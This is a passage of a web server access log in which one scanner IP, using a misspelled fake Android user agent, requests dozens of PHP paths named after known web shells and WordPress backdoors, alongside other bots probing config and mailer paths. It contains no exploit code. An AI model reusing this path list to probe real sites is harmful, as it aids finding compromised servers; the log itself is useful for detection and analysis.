HTTP/1.1" 301 269 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:08:44 -0400] "GET /gecko.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:08:46 -0400] "GET /tonant.php HTTP/1.1" 301 241 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:08:53 -0400] "GET /b.php HTTP/1.1" 301 236 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:09:02 -0400] "GET /xleet-shell.php HTTP/1.1" 301 246 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:09:08 -0400] "GET /4mosan.php HTTP/1.1" 301 241 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:09:12 -0400] "GET /cong.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:09:20 -0400] "GET /config.php HTTP/1.1" 301 241 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:09:31 -0400] "GET /wp-key.php HTTP/1.1" 301 241 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:09:38 -0400] "GET /wp-conctent.php HTTP/1.1" 301 246 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:09:47 -0400] "GET /flame.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:09:51 -0400] "GET /wp-content/flame.php HTTP/1.1" 301 251 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:09:56 -0400] "GET /block-patwp.php HTTP/1.1" 301 246 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:10:00 -0400] "GET /bre.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:10:01 -0400] "GET /lx.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 69.171.230.115 - - [12/Aug/2025:12:10:14 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 128.199.106.124 - - [12/Aug/2025:12:10:16 -0400] "GET /991176.php HTTP/1.1" 301 241 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 209.38.125.40 - - [12/Aug/2025:12:10:18 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.102.237.37 - - [12/Aug/2025:12:10:18 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:12:10:18 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 128.199.106.124 - - [12/Aug/2025:12:10:20 -0400] "GET /ffAA531.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 149.22.91.139 - - [12/Aug/2025:12:10:21 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 128.199.106.124 - - [12/Aug/2025:12:10:25 -0400] "GET /wp-help.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:10:29 -0400] "GET /un.php?f=f HTTP/1.1" 301 241 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:10:32 -0400] "GET /un2.php?f=f HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:10:37 -0400] "GET /wp-posts.php HTTP/1.1" 301 243 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:10:39 -0400] "GET /xl.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 149.22.91.139 - - [12/Aug/2025:12:10:42 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 128.199.106.124 - - [12/Aug/2025:12:10:47 -0400] "GET /ww.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:10:51 -0400] "GET /testwp.php?wp=1 HTTP/1.1" 301 246 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:11:00 -0400] "GET /kyami.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:11:07 -0400] "GET /wp-includes/class-wp-other.php HTTP/1.1" 301 261 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:11:09 -0400] "GET /unknown.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:11:12 -0400] "GET /1975.phP HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:11:20 -0400] "GET /Mo2AaAaAaPrivateShell.php HTTP/1.1" 301 256 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:11:25 -0400] "GET /god4m.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:11:30 -0400] "GET /tuco.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:11:35 -0400] "GET /x.php HTTP/1.1" 301 236 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:11:41 -0400] "GET /w.php HTTP/1.1" 301 236 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:11:45 -0400] "GET /chosen.php?p= HTTP/1.1" 301 248 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:11:48 -0400] "GET /.well-known/pki-validation/atomlib.php HTTP/1.1" 404 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:11:52 -0400] "GET /shl.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:11:53 -0400] "GET /wp-class.php HTTP/1.1" 301 243 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:11:56 -0400] "GET /info.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:11:58 -0400] "GET /o.php HTTP/1.1" 301 236 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:12:05 -0400] "GET /shx.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:12:10 -0400] "GET /l.php HTTP/1.1" 301 236 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:12:11 -0400] "GET /hi.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:12:20 -0400] "GET /readme.php HTTP/1.1" 301 241 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:12:26 -0400] "GET /pi.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:12:33 -0400] "GET /wp-content/themes/noriumportfolio/img_screen.php HTTP/1.1" 301 279 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:12:33 -0400] "GET /wp-admin/css/colors/blue/atomlib.php HTTP/1.1" 301 271 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:12:39 -0400] "GET /wp-content/themes/noriumportfolio/doc.php HTTP/1.1" 301 272 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:12:40 -0400] "GET /wp-content/themes/noriumportfolio/alpha.php HTTP/1.1" 301 274 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:12:42 -0400] "GET /wp-content/themes/noriumportfolio/db.php?u HTTP/1.1" 301 273 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:12:43 -0400] "GET /wp-content/themes/seotheme/db.php?u HTTP/1.1" 301 266 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:12:48 -0400] "GET /wp-content/themes/seotheme/mar.php HTTP/1.1" 301 265 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:12:59 -0400] "GET /wp-content/themes/skatepark/alpha.php HTTP/1.1" 301 268 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 146.190.11.185 - - [12/Aug/2025:12:13:02 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:12:13:03 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 164.90.241.135 - - [12/Aug/2025:12:13:03 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.203.144.167 - - [12/Aug/2025:12:13:03 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 128.199.106.124 - - [12/Aug/2025:12:13:06 -0400] "GET /wp-content/themes/skatepark/img_screen.php HTTP/1.1" 301 273 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:13:08 -0400] "GET /.well-known/acme-challenge/atomlib.php HTTP/1.1" 301 273 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:13:10 -0400] "GET /wp-content/themes/skatepark/db.php?u HTTP/1.1" 301 267 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:13:12 -0400] "GET /wp-content/themes/skatepark/doc.php HTTP/1.1" 301 266 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:13:17 -0400] "GET /wp-content/plugins/db/mar.php HTTP/1.1" 301 260 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 86.8.204.43 - - [12/Aug/2025:12:13:21 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [12/Aug/2025:12:13:21 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:12:13:21 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:12:13:21 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 128.199.106.124 - - [12/Aug/2025:12:13:24 -0400] "GET /wp-content/themes/wp-pridmag/22x.php HTTP/1.1" 301 267 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:13:28 -0400] "GET /wp-content/plugins/ndak/1.php HTTP/1.1" 301 260 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:13:42 -0400] "GET /wp-content/plugins/ndak/marijuana.php HTTP/1.1" 301 268 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:13:45 -0400] "GET /wp-content/themes/workart/db.php?u HTTP/1.1" 301 265 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:13:50 -0400] "GET /wp-content/plugins/cakil/up.php HTTP/1.1" 301 262 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:13:52 -0400] "GET /wp-content/plugins/cache-wordpress/wp-activates.php HTTP/1.1" 301 282 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:14:02 -0400] "GET /wp-content/plugins/cache-wordpress/payment.php HTTP/1.1" 301 277 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:14:08 -0400] "GET /wp-content/plugins/cekidot/readme.txt HTTP/1.1" 301 268 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:14:09 -0400] "GET /epinyins.php HTTP/1.1" 301 247 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:14:10 -0400] "GET /wp-content/plugins/cekidot/mar.php HTTP/1.1" 301 265 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:14:11 -0400] "GET /wp-content/themes/workart/doc.php HTTP/1.1" 301 264 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:14:18 -0400] "GET /wp-includes/Requests/atomlib.php HTTP/1.1" 301 267 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:14:23 -0400] "GET /wp-content/themes/theme/gr.php HTTP/1.1" 301 261 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:14:38 -0400] "GET /wp-content/themes/pridmag/init.php HTTP/1.1" 301 265 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:14:40 -0400] "GET /wp-content/themes/jobart/db.php?u HTTP/1.1" 301 264 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:14:43 -0400] "GET /wp-content/themes/jobart/doc.php HTTP/1.1" 301 263 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:14:46 -0400] "GET /wp-content/themes/cepair/doc.php HTTP/1.1" 301 263 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:14:48 -0400] "GET /wp-content/themes/cakiltheme/up.php HTTP/1.1" 301 266 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:14:49 -0400] "GET /wp-content/themes/cakiltheme/idx.php HTTP/1.1" 301 267 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:15:01 -0400] "GET /wp-content/themes/wp-pridmag/status.php HTTP/1.1" 301 270 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:15:05 -0400] "GET /wp-content/themes/wp-pridmag/up.php HTTP/1.1" 301 266 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 